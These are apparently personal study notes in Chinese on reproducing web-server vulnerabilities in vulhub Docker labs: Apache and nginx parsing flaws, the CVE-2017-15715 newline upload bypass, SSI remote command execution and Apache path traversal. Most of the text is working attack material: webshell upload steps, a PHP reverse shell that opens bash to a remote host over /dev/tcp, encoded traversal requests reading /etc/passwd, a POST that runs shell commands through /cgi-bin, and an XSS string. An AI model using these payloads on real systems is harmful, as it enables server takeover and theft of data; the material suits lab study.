DOCKER环境,一般是80 8080 8081端口
1 apache位置扩展名解析漏洞
cd vulhub-master/httpd/apache_parsing_vulnerability/
docker-compose up -d
修改一句话的后缀 直接上传
蚁剑
2 CVE-2017-15715
docker-compose stop
cd ..
cd CVE-2017-15715/
docker-compose up -d
在提交的时候抓包
在文件名后加+ 然后到HEX下把对应的2b改成0a, 放过去
直接访问不行,因为$匹配OA 注意这里0A要大写
能过黑名单,不能过白名单
3 SSI远程命令执行漏洞(服务器端包含)
docker-compose stop
cd ..
cd ssi-rce
docker-compose up -d
开ssi-rce
写shtml
直接上传
点击访问
需要查什么可以通过修改命令
但是再docker1中
4 nginx解析漏洞 过白名单
5 nginx文件名逻辑漏洞 过白名单
上传时抓包 文件名后加空格
正常访问不到,和视频不一样
6 可以反向shell <?php system("bash -c 'bash -i &>/dev/tcp/192.168.100.137/10086 0>&1'");?>
上传也要加空格,同上,访问也一样
访问前开监听,访问后可以连到服务器
6
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.100.131:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
If-None-Match: "2d-432a5e4a73a80"
Cache-Control: max-age=0
Content-Length: 7
echo;id
GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
<script>alert('xss')</script>